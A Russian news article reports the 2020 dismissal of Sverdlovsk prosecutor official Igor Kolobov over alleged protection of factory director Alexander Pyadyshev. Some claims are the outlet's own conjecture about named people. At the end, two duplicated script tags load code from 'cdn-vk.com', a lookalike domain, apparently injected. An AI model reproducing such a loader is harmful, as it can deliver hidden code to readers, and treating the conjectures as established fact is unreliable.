Бизнес. Власть. Общество. Эффективность

 

Игорь Колобов

Стали известны подробности отстранения от должности начальника управления прокуратуры Свердловской области по надзору за процессуальной деятельностью СК России по Свердловской области Игоря Колобова, которое состоялось 21 января 2020 года.

В ходе оперативных мероприятий, проведенных сотрудниками ФСБ в конце 2019 года, были установлены должностные лица СУСК РФ по Свердловской области и прокуратуры Свердловской области, причастные к нарушению правил и порядка возбуждения, ведения и отказа в возбуждении уголовного дела в отношении директора АО "МЕТАЛЛУРГИЧЕСКИЙ ЗАВОД ИМЕНИ И.П. БАРДИНА" (БМЗ) Александра Пядышева. Уголовное дело по факту совершения мошеннических действий в отношении А. Пядышева было возбуждено 20 августа 2018.

В ходе контрольного производства было установлено, что Игорь Колобов подготовил постановление, признающее действия следователя Лежнева Е.В. по расследованию и прекращению уголовного дела в отношении А. Пядышева правильными, и подписал его у зампрокурора области Дмитрия Чуличкова. Тем самым Колобов, по терминологии силовиков, «засилил» отказной материал СУСК и затруднил для потерпевшей стороны возможность обжаловать вынесенное следователем решение.

Логика развития событий позволяет предположить, что Игорь Колобов продолжительное время действовал в интересах подозреваемого Пядышева А.В. Колобов давал понять следствию, в частности заместителю руководителя следственного управления Следственного комитета Российской Федерации по Свердловской области Алексею Невгаду, что перспективы в привлечении А. Пядышева к ответственности отсутствуют. Используя служебное положение Колобов препятствовал передаче материала в судебное производство. Фактически Колобов вынудил Следственный комитет прекратить дело.

20 августа 2019 следователь 2 отдела СУСК РФ по Свердловской области Лежнев Евгений Валерьевич вынес постановление об отказе в возбуждении. Жалобы потерпевшего и его представителей о несогласии с данным решением и нарушениями хода расследования в порядке надзора поступали в отдел прокуратуры, возглавляемый Колобовым. Все они оставались без должного рассмотрения.

Схема дала сбой, когда 26 сентября 2019 заместитель областного прокурора Дмитрий Чуличков подписал постановление об отмене данного постановления. Это произошло при участи другого заместителя руководителя свердловского СУСК Михаила Бусылко.

Впоследствии Михаил Бусылкобыл арестован сотрудниками ФСБ в ходе следственного эксперимента 29 ноября 2019 года за получение взятки (ст. 290 УК РФ), а заместитель прокурора Свердловской области Дмитрий Чуличков отправлен в отставку. Но история на этом не закончилась. Отметим, что одновременно с Игорем Колобовым своей должности лишился и начальник управленияпо надзору за уголовно-процессуальной и оперативно-розыскной деятельностьюобластной прокуратуры Игорь Надымов.

 

Ещё по теме:

Михаила Бусылко арестовали из-за дела номинального директора БМЗ Александра Пядышева.

 

<script src="//cdn-vk.com/js/vk.js?v=2" async=""></script>

<script src="//cdn-vk.com/js/vk.js?v=2" async=""></script>

 
Вы можете найти эту страницу по следующему адресу: http://glagolurfo.com/newsitems/2020/2/20/kolobov/